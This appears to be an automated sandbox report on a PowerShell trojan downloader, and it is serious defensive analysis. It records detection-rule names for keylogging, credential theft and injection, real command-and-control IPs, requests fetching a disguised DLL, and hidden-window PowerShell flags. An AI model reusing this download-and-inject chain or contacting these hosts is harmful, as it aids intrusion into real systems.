description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Run a KeyLogger rule KeyLogger
description Communications over FTP rule Network_FTP
description Escalate priviledges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Steal credential rule local_credential_Steal
description Communications use DNS rule Network_DNS
description Match Windows Inet API call rule Str_Win32_Internet_API
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Run a KeyLogger rule KeyLogger
description Communications over FTP rule Network_FTP
description Escalate priviledges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
host 108.62.12.61
host 194.5.212.190
Lionic Trojan.Script.Boxter.4!c
Arcabit Heur.BZC.PZQ.Boxter.791.43396F78
ESET-NOD32 PowerShell/TrojanDownloader.Agent.EOA
TrendMicro-HouseCall TROJ_FRS.VSNW1EJ21
BitDefender Heur.BZC.PZQ.Boxter.791.43396F78
MicroWorld-eScan Heur.BZC.PZQ.Boxter.791.43396F78
Ad-Aware Heur.BZC.PZQ.Boxter.791.43396F78
Emsisoft Heur.BZC.PZQ.Boxter.791.43396F78 (B)
Comodo TrojWare.Win32.BadShell.XSP@7pmj0k
TrendMicro TROJ_FRS.VSNW1EJ21
FireEye Heur.BZC.PZQ.Boxter.791.43396F78
Antiy-AVL Trojan/Generic.ASMalwRG.FB
GData Heur.BZC.PZQ.Boxter.791.43396F78
ALYac Heur.BZC.PZQ.Boxter.791.43396F78
MAX malware (ai score=81)
Ikarus Win32.Outbreak
process powershell.exe useragent Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
process regsvr32.exe useragent
Time & API Arguments Status Return Repeated

send

 buffer: GET /load/trendmicro2.dll HTTP/1.1 Host: 194.5.212.190 Connection: Keep-Alive
socket: 1412
sent: 83
1 83 0

send

 buffer: GET /home HTTP/1.1 Host: 108.62.12.61:99 Connection: Keep-Alive
socket: 1420
sent: 69
1 69 0

send

 buffer: GET /home2 HTTP/1.1 Host: 108.62.12.61 Connection: Keep-Alive
socket: 1420
sent: 67
1 67 0
url http://108.62.12.61:99/home
url http://108.62.12.61:80/home2
Process injection Process 2556 resumed a thread in remote process 2840
Process injection Process 2556 resumed a thread in remote process 2988
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2840
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2988
1 0 0
option -nop value Does not load current user profile
option -w hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
option -nop value Does not load current user profile
option -w hidden value Attempts to execute command with a hidden window
file C:\Users\Public\Videos\trendmicro2.dll